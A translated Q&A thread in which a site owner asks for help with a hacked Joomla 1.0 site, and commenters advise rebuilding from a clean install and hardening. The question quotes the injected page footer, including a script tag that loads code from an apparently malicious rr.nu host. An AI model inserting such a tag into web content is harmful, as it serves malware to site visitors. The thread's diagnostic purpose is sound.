-1
我有一箇舊的joomla 10.0.15被黑了一個星期前,我沒有備份,因爲我們正在計劃遷移,但我需要知道發生了什麼。修復權限後,重新安裝所有核心文件,仍然有兩個問題,第一個是仍然有惡意代碼:Joomla網站被黑客入侵
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct ="UA-xxxxxxx-x";
urchinTracker();
</script>
<script src="http://equate22motorde.rr.nu/nl.php?p=d"></script>
</body>
與每一個重載的URL變化。我找不到代碼在哪裏。我檢查了模板和其他文件,但沒有。 ¿關於我可以在哪裏查看的任何想法?
另一個問題是文件和文件夾訪問,即使權限正常,這個joomla安裝無法寫入文件夾或修改任何文件。
在此先感謝。
試着問一個Joomla論壇。 – Steven 2012-03-27 15:01:04
請勿嘗試修復原始網站。正如德文在下面提到的,你不能確定發生了什麼變化,所以你永遠不會知道你是否已經修好了一切。如果您沒有備份,唯一安全的解決方案是在新的Joomla安裝中重建網站並複製媒體,但不要複製您的代碼。這是一個非常非常老版本的Joomla(3年以上)。尋求建議的最佳地點是在這裏的J1.0安全論壇:http://bit.ly/HbDJUs – Trev 2012-03-27 16:58:01
嘗試爲您的joomla網站安裝一些很好的安全擴展,定期檢查訪問日誌,阻止重要的權限文件,只安裝來自可靠來源的擴展,定期升級你的核心joomla源文件....這些是保護你的joomla網站的最低步驟。 – 2012-06-19 05:25:03